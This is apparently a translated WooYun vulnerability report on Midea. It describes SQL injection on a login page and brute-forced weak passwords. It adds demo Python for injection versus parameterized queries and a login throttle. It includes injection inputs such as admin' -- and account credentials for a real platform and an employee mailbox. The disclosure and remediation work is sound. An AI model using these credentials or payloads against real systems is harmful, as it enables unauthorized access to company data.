[11:16:34] [INFO] resumed: NUMBER
[11:16:34] [INFO] resumed: CREATEID
[11:16:34] [INFO] resumed: VARCHAR2


Screenshot: QQ截图20151211113845.png
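The root cause of 0X01 is a login query built by string concatenation, which is why a lone quote in tbUid produced an error and why sqlmap could append AND conditions to it. The page shows none of the application's code, so the example below is an added illustration rather than Midea's implementation: it uses a constructed in-memory SQLite table as a stand-in for the Oracle JD_ERS user table, contrasts the concatenated query with a parameterized one, and includes the single-quote probe that the screenshot above corresponds to. SQLite does not accept the Oracle-specific XMLType payload, so the injected conditions are kept to plain boolean ones; the remediation (bind variables, spelled :uid and :pwd with ODP.NET OracleParameter objects on the real stack) is the same either way.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in user table; the real JD_ERS login table is not shown on the page.
    Passwords are kept in clear text only to keep the demo short; real code compares a hash."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (uid TEXT PRIMARY KEY, pwd TEXT, role TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [("admin", "S3cret!Pass", "admin"), ("dd", "dd-pass", "user")])
    con.commit()
    return con


def login_concat(con: sqlite3.Connection, uid: str, pwd: str):
    """VULNERABLE: the user-controlled tbUid/tbPwd values are spliced into the SQL text.
    A quote in uid breaks the statement (the error in the screenshot); an AND clause
    in uid is evaluated as SQL, which is exactly what sqlmap relied on."""
    sql = f"SELECT uid, role FROM users WHERE uid = '{uid}' AND pwd = '{pwd}'"
    return con.execute(sql).fetchone()


def login_bound(con: sqlite3.Connection, uid: str, pwd: str):
    """FIXED: bind variables. The statement text is constant; input is only ever data.
    Oracle/ODP.NET spelling: "WHERE uid = :uid AND pwd = :pwd" plus OracleParameter values."""
    sql = "SELECT uid, role FROM users WHERE uid = ? AND pwd = ?"
    return con.execute(sql, (uid, pwd)).fetchone()


def probe_single_quote(login, con: sqlite3.Connection) -> bool:
    """True if a lone quote in the username makes the query fail to parse,
    the first symptom the report observed on Login.aspx."""
    try:
        login(con, "dd'", "x")
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    con = make_db()
    # Comment out the password check entirely (SQLite and Oracle both treat -- as a comment).
    print("concat, admin' --      ->", login_concat(con, "admin' --", "x"))
    # Boolean condition appended the way sqlmap's AND payloads are.
    print("concat, dd' AND 1=1 ...->", login_concat(con, "dd' AND 1=1 AND 'a'='a", "dd-pass"))
    print("concat, single quote   -> error:", probe_single_quote(login_concat, con))
    print("bound,  admin' --      ->", login_bound(con, "admin' --", "x"))
    print("bound,  single quote   -> error:", probe_single_quote(login_bound, con))
```

With the concatenated version the string admin' -- logs in as the administrator without a password and the single-quote probe raises a parse error; with bind variables both inputs are looked up literally as user names, match nothing, and return None. Parameterizing the query removes the injection; the separate problem that the login compares clear-text passwords should be fixed at the same time by storing and comparing password hashes.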


0X02 Weak password on another site
Vulnerable URL:

http://eng.midea.com.cn/AccountManager/Login?ReturnUrl=%2fContract%2fAlterDetails%2f2e47465d-e155-4d9f-9386-72b1b3a155c2


The login form has no CAPTCHA,

Screenshot: 协同管理外部平台.png (the collaborative-management external platform login)


so it can be brute-forced:

Screenshot: 13800000000-123456.png (the guessed credentials: username 13800000000, password 123456)


Login succeeds:

Screenshot: 13800000000-123456登录成功.png (successful login)


Unexpectedly, the account is an administrator, so it exposes sensitive company data:

Screenshot: 200多用户.png (200+ users)


Screenshot: 合同台账.png (contract ledger)


Also, a previously dismissed report:

WooYun: 美的某员工邮箱弱口令 (weak password on a Midea employee mailbox)


yangyt Midea123
This exposes sensitive company files, the address book, and so on.

Screenshot: 邮箱登录.png (mailbox login)


Screenshot: 内部文件.png (internal file)


Screenshot: 内部文件2.png (internal file 2)


Screenshot: 电话-邮箱-职位等.png (phone numbers, e-mail addresses, job titles, etc.)
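Both weak-password findings (0X02, and the mailbox report it references) share the same two missing controls: nothing slows down repeated guesses against one account or from one source, and nothing stops users from choosing 123456 or the company name with digits appended. The example below is an added illustration, not code from the page or from Midea: a sliding-window login throttle keyed on both account and source address, replayed over a constructed authentication log whose format is invented for this example (the page shows screenshots only), plus a password-policy check that explains why each of the passwords seen in the report would be refused. Thresholds (5 failures in 15 minutes, 12-character minimum) are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed authentication log (format invented for this example). One source guesses a
# password list against account 13800000000 and succeeds on the sixth try; a legitimate
# user then mistypes once and logs in normally.
SAMPLE_LOG = """\
2015-12-11 11:30:01 LOGIN_FAIL user=13800000000 ip=203.0.113.7
2015-12-11 11:30:02 LOGIN_FAIL user=13800000000 ip=203.0.113.7
2015-12-11 11:30:02 LOGIN_FAIL user=13800000000 ip=203.0.113.7
2015-12-11 11:30:03 LOGIN_FAIL user=13800000000 ip=203.0.113.7
2015-12-11 11:30:03 LOGIN_FAIL user=13800000000 ip=203.0.113.7
2015-12-11 11:30:04 LOGIN_OK user=13800000000 ip=203.0.113.7
2015-12-11 11:45:10 LOGIN_FAIL user=zhangsan ip=198.51.100.20
2015-12-11 11:45:30 LOGIN_OK user=zhangsan ip=198.51.100.20
"""
LOG_RE = re.compile(r"^(?P<ts>\S+ \S+) LOGIN_(?P<res>OK|FAIL) user=(?P<user>\S+) ip=(?P<ip>\S+)$")

# Small stand-in for a real breached-password list (assumed; use a full list in production).
COMMON_PASSWORDS = {"123456", "password", "12345678", "111111", "123123", "admin"}


class LoginThrottle:
    """Sliding-window failure counters, kept per account and per source address."""

    def __init__(self, max_failures: int = 5, window: timedelta = timedelta(minutes=15)):
        self.max_failures = max_failures
        self.window = window
        self.failures = defaultdict(deque)   # ("user", x) or ("ip", y) -> failure times

    def _recent(self, key, now: datetime) -> deque:
        q = self.failures[key]
        while q and now - q[0] > self.window:
            q.popleft()
        return q

    def allow(self, user: str, ip: str, now: datetime) -> bool:
        """Refuse the attempt, before any password check, once either key is exhausted."""
        return all(len(self._recent(k, now)) < self.max_failures
                   for k in (("user", user), ("ip", ip)))

    def record(self, user: str, ip: str, ok: bool, now: datetime) -> list:
        """Update counters; return the keys that just reached the threshold (alert material)."""
        if ok:
            self.failures.pop(("user", user), None)
            return []
        tripped = []
        for key in (("user", user), ("ip", ip)):
            q = self._recent(key, now)
            q.append(now)
            if len(q) == self.max_failures:
                tripped.append(key)
        return tripped


def replay(log_text: str, throttle: LoginThrottle = None):
    """Drive the throttle with a log; return (blocked lines, keys that tripped the threshold)."""
    throttle = throttle or LoginThrottle()
    blocked, alerts = [], []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        now = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        user, ip, ok = m["user"], m["ip"], m["res"] == "OK"
        if not throttle.allow(user, ip, now):
            blocked.append(line)
            continue
        alerts.extend(throttle.record(user, ip, ok, now))
    return blocked, alerts


def weak_password_reason(pw: str, context_words=(), min_len: int = 12):
    """Explain why a password is rejected; None means it passes these checks.
    context_words lets the policy refuse the company or product name (e.g. Midea123)."""
    low = pw.lower()
    if low in COMMON_PASSWORDS:
        return "in common-password list"
    for w in context_words:
        if w.lower() in low:
            return f"contains context word {w!r}"
    if len(pw) < min_len:
        return f"shorter than {min_len} characters"
    return None


if __name__ == "__main__":
    blocked, alerts = replay(SAMPLE_LOG)
    print("blocked:", blocked)
    print("alerts:", alerts)
    for pw in ("123456", "Midea123", "correct horse battery staple"):
        print(pw, "->", weak_password_reason(pw, context_words=("Midea",)))
```

Replaying the sample log, the fifth failure trips both the per-account and the per-source counters, so the sixth attempt (the one that would have succeeded with the guessed password) is refused before the credential is even checked, while the legitimate user with a single typo is unaffected. The tripped keys are what to forward to monitoring. Checking both keys matters: throttling only by IP is defeated by rotating sources, and throttling only by account is defeated by spraying one password across many accounts. The policy check refuses 123456 as a listed password and Midea123 because it contains the company name, which is a cheap rule to add to any password-change form.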


Proof of vulnerability:

As above.
Submitted yesterday:

http://www.wooyun.org/bugs/wooyun-2015-0160269/trace/b03134ca0952158157208aef0185ff81

It was rejected, but the vulnerability is not fixed; please fix it before publishing.

Remediation:

Take it seriously.
These vulnerabilities are bundled into one submission; 20 Rank is not unreasonable, thanks.

Copyright notice: when reposting, credit 心云@乌云


Vendor Response

Vendor response:

Severity: Medium

Rank: 10

Confirmed: 2015-12-11 17:39

Vendor reply:

Three-in-one gift package received, thanks!

Latest status:

None


Comments:

  1. 2015-12-11 18:16 | 心云 ( Regular white hat | Rank:184 Vulns:57 | Rank:200 Vulns:55 | Rank:300 Vulns:70 ...)

    @midea.com You've accepted it, now make sure to fix it. Any small gift? Bug hunting isn't easy T_T